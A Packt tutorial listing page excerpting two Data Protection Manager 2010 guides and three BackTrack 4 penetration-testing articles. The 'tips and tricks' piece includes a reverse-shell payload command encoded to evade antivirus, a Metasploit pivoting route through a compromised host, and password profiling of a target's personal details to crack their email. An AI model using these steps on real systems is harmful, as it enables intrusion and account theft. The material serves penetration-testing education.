
How-To Tutorials - Security

174 Articles

Installing Data Protection Manager 2010

Packt
01 Jun 2011
6 min read
With the DPM upgrade you will face some of the same issues as with a fresh installation: what are the prerequisites, is your operating system patched, and is DPM 2007 fully patched and ready for the upgrade? This article walks you through each step of the DPM installation process in the first half and the DPM 2007 to DPM 2010 upgrade in the second half. After reading this article you should know what to look for when working through the prerequisites and requirements. The goal is to ensure that your install or upgrade goes smoothly.

Prerequisites

In this section we will jump right into the prerequisites for DPM and how to install them, as well as the two different ways to install DPM. We will also go through the DPM 2007 to DPM 2010 upgrade process. We will first visit the hardware and software requirements, and a pre-install step that is needed before you are able to actually install DPM 2010.

Hardware requirements

DPM 2010 requires a 1 GHz (dual-core or faster) processor and 4 GB of RAM or more; the page file should be set to 1.5 to 2 times the amount of RAM on the computer. The DPM disk space requirements are as follows:

- DPM installation location: 3 GB free
- Database file drive: 900 MB free
- System drive: 1 GB free
- Disk space for protected data: 2.5 to 3 times the size of the protected data

DPM also needs to be on a dedicated, single-purpose computer.

Software requirements

DPM has requirements for both the operating system and the software that must be on the server before DPM can be installed. Let's take a look at what these requirements are.

Operating system

DPM 2007 can be installed on both 32-bit and x64 operating systems. However, DPM 2010 is supported only on x64 operating systems, specifically Windows Server 2008 and Windows Server 2008 R2. It is recommended that you install DPM 2010 on Windows Server 2008 R2. DPM can be deployed in a Windows Server 2008, Windows Server 2008 R2, or Windows Server 2003 Active Directory domain. Be sure to run Windows Update and completely patch the server before you start the DPM installation, no matter which operating system you use.

If you use Windows Server 2008 for your DPM deployment, you will need to install some hotfixes before you start the DPM installation. The hotfixes are as follows:

- FIX: You are prompted to format the volume when a formatted volume is mounted on an NTFS folder that is located on a computer that is running Windows Server 2008 or Windows Vista (KB971254).
- Dynamic disks are marked as "Invalid" on a computer that is running Windows Server 2008 or Windows Vista when you bring the disks online, take the disks offline, or restart the computer if Data Protection Manager is installed (KB962975).
- An application or service that uses a file system filter driver may experience function failure on a computer that is running Windows Vista, Windows Server 2003, or Windows Server 2008 (KB975759).
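If you want to confirm whether these hotfixes are already present before launching setup, you can query the installed updates from an elevated command prompt. This is a minimal sketch using the standard wmic and findstr tools with the three KB numbers listed above; it is not part of the original article:

    rem List any of the three required hotfixes that are already installed;
    rem no output means none of them is present yet
    wmic qfe get HotFixID | findstr /i "KB971254 KB962975 KB975759"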
Software

By default, DPM will install any software prerequisites automatically if they are not already enabled or installed. Sometimes these software prerequisites fail during the DPM setup; if they do, you can install them manually. Visit the Microsoft TechNet site for detailed information on installing the software prerequisites. The following is a list of the software that DPM requires before it can be installed:

- Microsoft .NET Framework 3.5 with Service Pack 1 (SP1)
- Microsoft Visual C++ 2008 Redistributable
- Windows PowerShell 2.0
- Windows Installer 4.5 or later
- Windows Single Instance Store (SIS)
- Microsoft Application Error Reporting

NOTE: It is recommended that you manually install Single Instance Store on your server before you even begin the DPM 2010 installation. A step-by-step installation of Single Instance Store, along with a detailed explanation, follows later in this article.

User privilege requirements

The server that you plan to install DPM on must be joined to a domain before you install the DPM software. In order to join the server to the domain you need at least domain administrative privileges. You also need administrative privileges on the local server to install the DPM software.

Restrictions

DPM has to be installed on a dedicated server. It is best to make sure that DPM is the only server role running on the server you use for it; you will run into issues if you try to install DPM on a server with other roles on it. The following are the restrictions you need to pay attention to when installing DPM:

- DPM should not be installed on a domain controller (not recommended)
- DPM cannot be installed on an Exchange server
- DPM cannot be installed on a server with System Center Operations Manager installed on it
- The server you install on cannot be a node in a cluster

There is one exception: you can install DPM on a domain controller and make it work, but this is not supported by Microsoft.

Single Instance Store

Before you install DPM on your server, it is important to install a technology called Single Instance Store (SIS). SIS ensures you get the maximum performance out of your disk space and reduces the bandwidth needs of DPM. SIS is a technology that keeps the overhead of handling duplicate files low; this is often referred to as de-duplication. SIS eliminates data duplication by storing only one copy of files on backup storage media. It is used in storage, mail, and backup solutions such as DPM, and helps to lower both the bandwidth costs of copying data across a network and the storage space needed. Microsoft has used single instance storage in Exchange since version 4.0. SIS searches a hard disk and identifies duplicate files, then saves only one copy of the files to a central location such as a DPM storage pool. SIS then replaces the other copies of the files with pointers to the copy the SIS repository already has stored.

Installing Single Instance Store (SIS)

The following procedure walks you through the steps required to install SIS:

1. Click on Start and then click on Run. In the Run dialog box, type CMD.exe and press OK.
2. At the command prompt, type the following and press Enter:

   start /wait ocsetup.exe SIS-Limited /quiet /norestart

3. Restart the server.

To ensure the installation of SIS went okay, check for the existence of the SIS registry key. Click on Start, then click Run. In the Run dialog box, type regedit and press OK. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SIS. If the SIS key is shown in the registry, Single Instance Store (SIS) is installed properly and you can be sure to get the maximum performance out of your disk space on the DPM server.
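If you prefer to verify the SIS installation from a script rather than opening regedit, the same check can be done with the standard reg tool. A minimal sketch, assuming the key path given above; this is not from the original article:

    rem Succeeds and prints the key if Single Instance Store is installed;
    rem fails with an error if the key does not exist
    reg query HKLM\SYSTEM\CurrentControlSet\Services\SIS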


Overview of Data Protection Manager 2010

Packt
30 May 2011
9 min read
Microsoft Data Protection Manager 2010: a practical step-by-step guide to planning deployment, installation, configuration, and troubleshooting of Data Protection Manager 2010.

DPM structure

In this section we will look at the DPM file structure in order to have a better understanding of where DPM stores its components. We will also look at the important processes that DPM runs and what they are used for, along with some hints and tips that will be useful when administering DPM.

DPM file locations

It is important to know not only how DPM operates, but also the structure that is underneath the application. Understanding where the DPM components live will help you with administering and troubleshooting DPM if the need arises. The following are some important locations:

- C:\Program Files\Microsoft DPM\DPM\Volumes\ShadowCopy\Database Backups: This is where the DPM database backups are stored. Backup shadow copies of your replicas are also stored in this directory; you would make backup shadow copies of your replicas if you were archiving them using a third-party backup solution.
- C:\Program Files\Microsoft DPM: The directory where DPM is installed.
- C:\Program Files\Microsoft DPM\DPM\bin: This directory contains the PowerShell scripts that come with DPM. There are many scripts that can be used for performing common DPM tasks.
- C:\Program Files\Microsoft DPM\SQL: This folder contains the database and files for SQL reporting services.
- C:\Program Files\Microsoft DPM\DPM\DPMDB: This directory contains the SQL DPM database (the .MDF and .LDF files).
- C:\Program Files\Microsoft DPM\DPM\Volumes\DiffArea: This directory stores the shadow copy volumes that are recovery points for a data source. These are essentially the changed blocks of VSS (Volume Shadow Copy Service) shadow copies.
- C:\Program Files\Microsoft DPM\DPM\Volumes\Replica: This folder contains mounted replica volumes. Mounted replica volumes are essentially pointers, one for every protected data object, to the partition in a DPM storage pool. Think of these mounted replica points as a map from DPM to the hard drives where the actual protected data lives.

DPM processes

We are now going to explore the DPM processes. The executable files for these are all located in C:\Program Files\Microsoft DPM\DPM\bin. You can view these processes in Windows Task Manager, and they show up in Windows Services as well. We will look at what each of these processes is and what it does, and then at the processes that have an impact on the performance of your DPM server. The processes are as follows:

- DPMAMService.exe: Listed in Windows Services as the DPM AccessManager Service. This manages access to DPM.
- DpmWriter.exe: This is a service as well, so you will see it in the services list. It is used for archiving; it manages the backup shadow copies of replicas, backups of report databases, and DPM backups.
- Msdpm.exe: The DPM service is the core component of DPM. It manages all core DPM operations, including replica creation, synchronization, and recovery point creation, and it implements and manages synchronization and shadow copy creation for protected file servers.
- DPMLA.exe: This is the DPM Library Agent Service.
- DPMRA.exe: This is the DPM Replication Agent. It helps to back up and recover file and application data to DPM.
- Dpmac.exe: This is known as the DPM Agent Coordinator Service. It manages the installation, uninstallation, and upgrade of DPM protection agents on the remote computers that you need to protect.
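To confirm these components from a command prompt instead of Task Manager, you can query the processes and services directly. A minimal sketch using the standard tasklist and sc tools; the short service name MSDPM is an assumption here, so verify it on your own installation (for example with sc query state= all):

    rem Check that the core DPM engine process is running
    tasklist /fi "imagename eq msdpm.exe"
    rem Query the DPM service by its short name (assumed to be MSDPM)
    sc query MSDPM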
DPM processes that impact DPM performance

The Msdpm.exe, MsDpmProtectionAgent.exe, Microsoft$DPM$Acct.exe, and mmc.exe processes take a toll on DPM performance.

mmc.exe is a standard Windows process. MMC stands for Microsoft Management Console, an application used to host various management plug-ins. Many (though not all) Microsoft server applications run in an MMC, such as Exchange, ISA, IIS, System Center, and the Microsoft Server Manager. The DPM Administrator Console runs in an MMC as well. mmc.exe can cause high memory usage; the best way to ensure that this process does not overload your memory is to close the DPM Administrator Console when you are not using it.

MsDpmProtectionAgent.exe is the DPM Protection Agent service and affects both CPU and memory usage when DPM jobs and consistency checks run. There is nothing you can do to reduce the usage of this service; just be aware of it and try not to schedule other resource-intensive applications, such as antivirus scans, at the same time as DPM jobs or consistency checks.

Msdpm.exe is the service that runs synchronizations and shadow copy creations, as stated previously. Like MsDpmProtectionAgent.exe, it affects CPU and memory usage when running synchronizations and shadow copies, and likewise there is nothing you can do to reduce its memory and CPU usage. Just make sure to keep the system clear of resource-intensive applications while it is running jobs.

If you are running a local SQL instance for your DPM deployment, you will notice a Microsoft$DPM$Acct.exe process. The SQL Server and SQL Agent services use a Microsoft$DPM$Acct account, which normally runs at a high level. This process reserves part of your system's memory for cache; if system memory runs low, the Microsoft$DPM$Acct.exe process will release the memory cache it has reserved.

Important DPM terms

In this section you will learn some important terms commonly used in DPM. You will need to understand these terms as you begin to administer DPM on a regular basis. You can read the full list of terms at http://technet.microsoft.com/en-us/library/bb795543.aspx. We have grouped the terms so that each group relates to an area of DPM. The following are some important terms:

- Bare metal recovery: A restore technique that allows one to restore a complete system onto bare metal, without any requirements as to the previous hardware. This allows restoring to dissimilar hardware.
- Change journal: A feature that tracks changes to NTFS (New Technology File System) volumes, including additions, deletions, and modifications. The change journal exists on the volume as a sparse file. Sparse files are used to make disk space usage more efficient in NTFS: a sparse file allocates disk space only when it is needed, which allows files to be created even when there is insufficient space on a hard drive, because these files contain zeroes instead of disk blocks.
- Consistency check: The process by which DPM checks for and corrects inconsistencies between a protected data source and its replica. A consistency check is only performed when the normal mechanisms for recording changes to protected data, and for applying those changes to replicas, have been interrupted.
- Express full backup: A synchronization operation in which the protection agent transfers a snapshot of all the blocks that have changed since the previous express full backup (or, for the first express full backup, since the initial replica creation).
- Shadow copy: A point-in-time copy of files and folders that is stored on the DPM server. Shadow copies are sometimes referred to as snapshots.
- Shadow copy client software: Client software that enables an end user to independently recover data by retrieving a shadow copy.
- Replica: A complete copy of the protected data on a single volume, database, or storage group. Each member of a protection group is associated with a replica on the DPM server.
- Replica creation: The process by which a full copy of the data sources selected for inclusion in a protection group is transferred to the DPM storage pool. The replica can be created over the network from data on the protected computer or from a tape backup system. Replica creation is an initialization process that is performed for each data source when the data source is added to a protection group.
- Replica volume: A volume on the DPM server that contains the replica for a protected data source.
- Custom volume: A volume that is not in the DPM storage pool and is specified to store the replica and recovery points for a protection group member.
- Dismount: To remove a removable tape or disc from a drive.
- DPM Alerts log: A log that stores DPM alerts as Windows events so that the alerts can be displayed in Microsoft System Center Operations Manager (SCOM).
- DPMDB.mdf: The filename of the DPM database, the SQL Server database that stores DPM settings and configuration information.
- DPMDBReaders group: A group, created during DPM installation, that contains all accounts that have read-only access to the DPM database. The DPMReport account is a member of this group.
- DPMReport account: The account that the Web and NT services of SQL Server Reporting Services use to access the DPM database. This account is created when an administrator configures DPM reporting.
- MICROSOFT$DPM$: The name that DPM setup assigns to the SQL Server instance used by DPM.
- Microsoft$DPMWriter$ account: The low-privilege account under which DPM runs the DPM Writer service. This account is created during the DPM installation.
- MSDPMTrustedMachines group: A group that contains the domain accounts for computers that are authorized to communicate with the DPM server. DPM uses this group to ensure that only computers that have the DPM protection agent installed from a specific DPM server can respond to calls from that server.
- Protection configuration: The collection of settings that is common to a protection group; specifically, the protection group name, disk allocations, replica creation method, and on-the-wire compression.
- Protection group: A collection of data sources that share the same protection configuration.
- Protection group member: A data source within a protection group.
- Protected computer: A computer that contains data sources that are protection group members.
- Synchronization: The process by which DPM transfers changes from the protected computer to the DPM server, and applies the changes to the replica of the protected volume.
- Recovery goals: The retention range, data loss tolerance, and frequency of recovery points for protected data.
- Recovery collection: The aggregate of all recovery jobs associated with a single recovery operation.
- Recovery point: The date and time of a previous version of a data source that is available for recovery from media that is managed by DPM.
- Report database: The SQL Server database that stores DPM reporting information (ReportServer.mdf).
- ReportServer.mdf: In DPM, the filename for the report database, a SQL Server database that stores reporting information.
- Retention range: The duration of time for which data should be available for recovery.


FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing, a guide to mastering the art of penetration testing with BackTrack.

Q: Which version of BackTrack should be chosen?

A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or on third-party mirrors such as http://mirrors.rit.edu/backtrack/ or ftp://mirror.switch.ch/mirror/backtrack/, you will find BackTrack version 4 in two different formats. (BackTrack 5 has recently been released, so you may not find version 4 on the official site, but the mirror sites still provide it.) The first format is an ISO image file. Use this format if you want to burn it to a DVD, write it to a USB drive or memory card (SSD, SDHC, SDXC, and so on), or install BackTrack directly to your machine. The second format is a VMWare image. If you want to use BackTrack in a virtual environment, this image will speed up the installation and configuration.
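Whichever format you download, it is worth verifying the image before using it. This step is not in the original article; a minimal sketch, assuming the MD5 checksum published on the download page and a placeholder filename:

    # Compare the output against the MD5 value published next to the download
    # (bt4-final.iso is a placeholder filename)
    md5sum bt4-final.iso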
Q: What is Portable BackTrack?

A: You can also install BackTrack to a USB flash disk; we call this method Portable BackTrack. After you install it to the USB flash disk, you can easily boot into BackTrack from any machine with a USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. Compared to a hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools, including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com), and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for the Windows, Linux/UNIX, and Mac operating systems.

Q: How do I install BackTrack in a dual-boot environment?

A: One resource that describes how to install BackTrack alongside other operating systems, such as Windows XP, can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.

Q: What types of penetration testing tools are available under BackTrack 4?

A: BackTrack 4 comes with a number of security tools that can be used during the penetration testing process. They are categorized as follows:

- Information gathering: Tools that can be used to collect information regarding the target's DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from publicly available resources such as the Internet, without touching the target environment.
- Network mapping: Tools that can be used to assess the live status of the target host, fingerprint the operating system, and probe and map the applications/services through various port scanning techniques.
- Vulnerability identification: Tools to scan for vulnerabilities in various IT technologies, including tools to carry out manual and automated fuzz testing and to analyze the SMB and SNMP protocols.
- Web application analysis: Tools that can be used to assess the security of web servers and web applications.
- Radio network analysis: Tools to audit wireless networks, Bluetooth, and radio-frequency identification (RFID) technologies.
- Penetration: Tools that can be used to exploit the vulnerabilities found in the target environment.
- Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level.
- Maintaining access: Tools in this category help you maintain access to the target machine. Note that you might need to escalate your privileges before attempting to install any of these tools on the compromised host.
- Voice over IP (VOIP): Tools to analyze the security of VOIP technology.

BackTrack 4 also contains tools that can be used for:

- Digital forensics: Several tools that can be used to perform digital forensics and investigation, such as acquiring a hard disk image, carving files, and analyzing a disk archive. Some practical forensic procedures require you to mount the hard drive in question and swap files in read-only mode to preserve evidence integrity.
- Reverse engineering: Tools that can be used to debug, decompile, and disassemble executable files.

Q: Do I have to install additional tools with BackTrack 4?

A: Although BackTrack 4 comes preloaded with many security tools, there are situations where you may need to add tools or packages, either because a tool is not included with the default BackTrack 4 installation or because you want the latest version of a particular tool that is not available in the repository. Our first suggestion is to search for the package in the software repository. If you find the package in the repository, use that package; if you can't find it, you can get the software package from the author's website and install it yourself. The former method is highly recommended to avoid installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. If you can't find the package in the repository and you are sure the package will not cause problems later on, you can install the package yourself.

Q: Why do we use the WebSecurify tool?

A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in web applications. It can be used to check for the following vulnerabilities:

- SQL injection
- Local and remote file inclusion
- Cross-site scripting
- Cross-site request forgery
- Information disclosure
- Session security flaws

WebSecurify is readily available from the BackTrack repository. To install it you can use the apt-get command:

# apt-get install websecurify
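As a minimal sketch of the recommended repository-first workflow described above, using websecurify as the example package:

    # Refresh the package lists, search the repository, then install
    apt-get update
    apt-cache search websecurify
    apt-get install websecurify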
Q: What are the types of penetration testing?

A: Black-box testing: The black-box approach is also known as external testing. When applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, it may reveal known and unknown sets of vulnerabilities that exist on the network.

White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for the auditor to view and critically evaluate security vulnerabilities with the minimum possible effort.

Grey-box testing: The combination of both types of penetration testing provides a powerful insight into internal and external security viewpoints. This combination is known as grey-box testing. The key benefit in devising and practicing a grey-box approach is the set of advantages posed by both of the approaches mentioned earlier.

Q: What is the difference between vulnerability assessment and penetration testing?

A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws on the system under consideration. Another major difference is that penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment, whereas the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is also an expensive service when compared to vulnerability assessment.

Q: Which class of vulnerability is considered the worst to resolve?

A: A design vulnerability requires the developer to derive the specifications from the security requirements and address their implementation securely. Thus, it takes more time and effort to resolve than other classes of vulnerability.

Q: Which OSSTMM test type follows the rules of penetration testing?

A: Double blind testing.

Q: What is the Application Layer?

A: Layer 7 of the Open Systems Interconnection (OSI) model is known as the Application Layer. The key function of the OSI model is to provide a standardized way of communicating across heterogeneous networks. The model is divided into seven logical layers, namely Physical, Data link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information can be found at: http://en.wikipedia.org/wiki/OSI_model.

Q: What are the steps of the BackTrack testing methodology?

A: [Figure: the BackTrack testing process]

Summary

In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently.

Further resources on this subject:

- Tips and Tricks on BackTrack 4 [Article]
- BackTrack 4: Target Scoping [Article]
- BackTrack 4: Security with Penetration Testing Methodology [Article]
- Blocking Common Attacks using ModSecurity 2.5 [Article]
- Telecommunications and Network Security Concepts for CISSP Exam [Article]
- Preventing SQL Injection Attacks on your Joomla Websites [Article]


Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
BackTrack 4: Assuring Security by Penetration Testing, a guide to mastering the art of penetration testing with BackTrack.

Updating the kernel

The update process is enough for updating the software applications. However, sometimes you may want to update your kernel because your existing kernel doesn't support a new device. Please remember that because the kernel is the heart of the operating system, a failed upgrade may leave your BackTrack unbootable, so make a backup of your kernel and configuration first. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to BackTrack users, and updating with other kernel versions could disable those features.

Multiple customized installations

One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (a 300 MB download) after you've installed it from the ISO or from the VMWare image provided. If you have one machine and a high-speed Internet connection, there's not much to worry about. However, imagine installing BackTrack 4 on several machines, in several locations, with a slow Internet connection. The solution to this problem is to create an ISO image with all the upgrades already installed. If you then want to install BackTrack 4, you can install it from the newly created ISO image without downloading the big upgrade again. For the VMWare image, you can solve the problem by doing the upgrade in the virtual image, then copying that updated virtual image to each new VMWare installation.

Efficient methodology

Combining the power of two methodologies, the Open Source Security Testing Methodology Manual (OSSTMM) and the Information Systems Security Assessment Framework (ISSAF), provides a sufficient knowledge base to assess the security of an enterprise environment efficiently.

Can't find the dnsmap program

In our testing, the dnsmap-bulk script does not work because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using the nano text editor and change the following:

dnsmap $i
elif [[ $# -eq 2 ]]
then
dnsmap $i -r $2

to

./dnsmap $i
elif [[ $# -eq 2 ]]
then
./dnsmap $i -r $2

and save your changes.
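If you would rather script this edit than open nano, a sed one-liner can apply the same change. A minimal sketch, assuming the dnsmap invocations start at the beginning of a line exactly as shown above; back up the script first:

    cd /pentest/enumeration/dns/dnsmap
    cp dnsmap-bulk.sh dnsmap-bulk.sh.bak
    # Prefix bare dnsmap invocations with ./ so the script finds the local binary
    sed -i 's|^dnsmap |./dnsmap |' dnsmap-bulk.sh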
fierce version

Currently, fierce version 1, included with BackTrack 4, is no longer maintained by its author (RSnake). He has suggested using fierce version 2, which is still actively maintained by Jabra. fierce version 2 is a rewrite of version 1 and has several new features, such as virtual host detection, subdomain and extension bruteforcing, a template-based output system, and XML support for integration with Nmap. Since fierce version 2 has not been released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion checkout command:

#svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/

Make sure you are in the /pentest/enumeration directory before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.

Relationship between "vulnerability" and "exploit"

A vulnerability is a security weakness found in a system that can be used by an attacker to perform unauthorized operations, while an exploit is a piece of code (a proof-of-concept, or PoC) written to take advantage of that vulnerability or bug in an automated fashion.

Cisco privilege modes

There are 16 different privilege modes available for Cisco devices, ranging from 0 (the most restricted level) to 15 (the least restricted level). Every account created should be configured to work under a specific privilege level. More information is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.

Cisco Passwd Scanner

The Cisco Passwd Scanner was developed to scan a whole range of IP addresses in a specific network class, represented as A, B, or C in network computing terms. Each class has its own definition of the number of hosts to be scanned. The tool is fast and efficient at handling multiple threads in a single instance. It discovers Cisco devices carrying the default telnet password "cisco"; we have found a number of Cisco devices vulnerable in this way.

Common User Passwords Profiler (CUPP)

As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain conditions: the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. It then comes down to guessing and breaking the password using various password-cracking techniques (dictionary or brute-force methods). CUPP is designed purely to generate a list of common passwords by profiling the target's name, birthday, nickname, family members' information, pet names, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method when attempting to crack the target's e-mail account password.

Extracting particular information from the exploits list

Using the power of bash commands we can manipulate the output of any text file to retrieve meaningful data. For example, typing cat files.csv | grep '"' | cut -d";" -f3 on your console will extract the list of exploit titles from files.csv. To learn the basic shell commands, refer to the online source at: http://tldp.org/LDP/abs/html/index.html.

"Inline" and "stager" type payloads

An inline payload is a single self-contained shellcode that is executed with one instance of an exploit, while a stager payload creates a communication channel between the attacker and victim machine over which the rest of the staged shellcode is read to perform the specific task. It is common practice to choose stager payloads because they are much smaller in size than inline payloads.

Extending the attack landscape by gaining deeper access to a part of the target's network that is inaccessible from outside

Metasploit provides the capability to view and add new routes to a destination network using the route add targetSubnet targetSubnetMask SessionId command (for example, route add 10.2.4.0 255.255.255.0 1). The SessionId points to an existing meterpreter session (also called the gateway), created after successful exploitation. The targetSubnet is another network address (a dual-homed Ethernet IP address) attached to the compromised host. Once Metasploit is set to route all the traffic through the compromised host's session, we are ready to penetrate further into a network that is normally non-routable from our side. This technique is commonly known as pivoting or foot-holding.
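As a minimal sketch of that sequence inside the Metasploit console, using the example values from above (session ID 1 is assumed to be an open meterpreter session):

    # Route traffic for 10.2.4.0/24 through meterpreter session 1
    route add 10.2.4.0 255.255.255.0 1
    # Confirm the new entry in Metasploit's routing table
    route print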
Evading antivirus protection using Metasploit

Using the msfencode tool located at /pentest/exploits/framework3, we can generate a self-protecting executable file with an encoded payload. This parallels the msfpayload file-generation process: "raw" output from msfpayload is piped into msfencode, which applies a specific encoding technique before outputting the final binary. For instance, execute:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe

to generate an encoded version of a reverse shell executable. We strongly suggest using "stager" type payloads instead of "inline" payloads, as they have a greater probability of bypassing major malware defenses due to their indefinite code signatures.

Stunnel version 3

BackTrack also comes with Stunnel version 3. The difference from Stunnel version 4 is that version 4 uses a configuration file. If you want to use the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments.

Summary

In this article we took a look at some tips and tricks to make the best use of the BackTrack OS.

Further resources on this subject:

- FAQs on BackTrack 4 [Article]
- BackTrack 4: Target Scoping [Article]
- BackTrack 4: Security with Penetration Testing Methodology [Article]
- Blocking Common Attacks using ModSecurity 2.5 [Article]
- Telecommunications and Network Security Concepts for CISSP Exam [Article]
- Preventing SQL Injection Attacks on your Joomla Websites [Article]


BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap, providing practical ideas and proven practices that should be handled with great care in order to assess system security correctly. Let's take a look at what this methodology looks like; it will help ensure you're using BackTrack effectively and that your tests are thorough and reliable.

Penetration testing can be carried out independently or as part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, the Microsoft SDLC). It is vital to note that the security of a product depends not only on factors relating to the IT environment, but also on product-specific security best practices. This involves implementing appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. Penetration testing is considered the last and most aggressive form of security assessment, handled by qualified professionals with or without prior knowledge of the system under examination. It can be used to assess all IT infrastructure components, including applications, network devices, operating systems, communication media, physical security, and human psychology. The output of penetration testing usually contains a report divided into several sections, addressing the weaknesses found in the current state of the system, followed by their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester in understanding and critically analyzing the integrity of the current defenses during each stage of the testing process.

Different types of penetration testing

Although there are different types of penetration testing, the two most general approaches widely accepted by the industry are black-box and white-box testing. These approaches are discussed in the following sections.

Black-box testing

The black-box approach is also known as external testing. When applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, it may reveal known and unknown sets of vulnerabilities that exist on the network. An auditor dealing with black-box testing is also known as a black-hat. It is important for the auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would occur following a successful penetration. An ideal penetration tester would pursue any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into business context.

White-box testing

The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for the auditor to view and critically evaluate security vulnerabilities with the minimum possible effort.
An auditor engaged with white-box testing is also known as a white-hat. White-box testing brings more value to the organization than the black-box approach in the sense that it eliminates internal security issues lying in the target infrastructure environment, thus making it harder for a malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is similar to that of black-box testing, except that the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate possible security issues at an early stage, before they are disclosed and exploited by intruders. The time and cost required to find and resolve security vulnerabilities is comparably less than with the black-box approach.

The combination of both types of penetration testing provides a powerful insight into internal and external security viewpoints. This combination is known as grey-box testing, and an auditor engaged with grey-box testing is also known as a grey-hat. The key benefit in devising and practicing a grey-box approach is the set of advantages posed by both of the approaches mentioned earlier. However, it does require an auditor with limited knowledge of the internal system to choose the best way to assess its overall security. On the other side, the external testing scenarios geared by the grey-box approach are similar to those of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology.

Vulnerability assessment versus penetration testing

Since the exponential growth of the IT security industry, there have always been diverse understandings and practices around the correct terminology for security assessment. Commercial-grade companies and non-commercial organizations alike misinterpret these terms when contracting for a specific type of security assessment. For this obvious reason, we decided to include a brief description of vulnerability assessment and differentiate its core features from penetration testing.

Vulnerability assessment is a process for assessing internal and external security controls by identifying the threats that pose serious exposure to the organization's assets. This technical infrastructure evaluation not only points out the risks in the existing defenses but also recommends and prioritizes remediation strategies. An internal vulnerability assessment provides assurance for securing the internal systems, while an external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing processes, tools, and techniques is followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved using an integrated vulnerability management platform that manages an up-to-date vulnerability database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management.
A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws on the system under consideration. Another major difference is that penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment, whereas the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner.

This perception within the industry, when dealing with both of these assessment types, may lead to the terms being confused and used interchangeably, which is wrong. A qualified consultant always works out the best type of assessment based on the client's business requirements rather than misleading them from one to the other. It is also the duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment.

Security testing methodologies

Various open source methodologies have been introduced to address security assessment needs. Using these assessment methodologies, one can more easily handle the time-critical and challenging task of assessing system security, depending on its size and complexity. Some of these methodologies focus on the technical aspect of security testing, while others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies within your assessment is to execute different types of tests step by step in order to judge the security of a system accurately. Therefore, we introduce four such well-known security assessment methodologies to provide an extended view of assessing network and application security, highlighting their key features and benefits. These include:

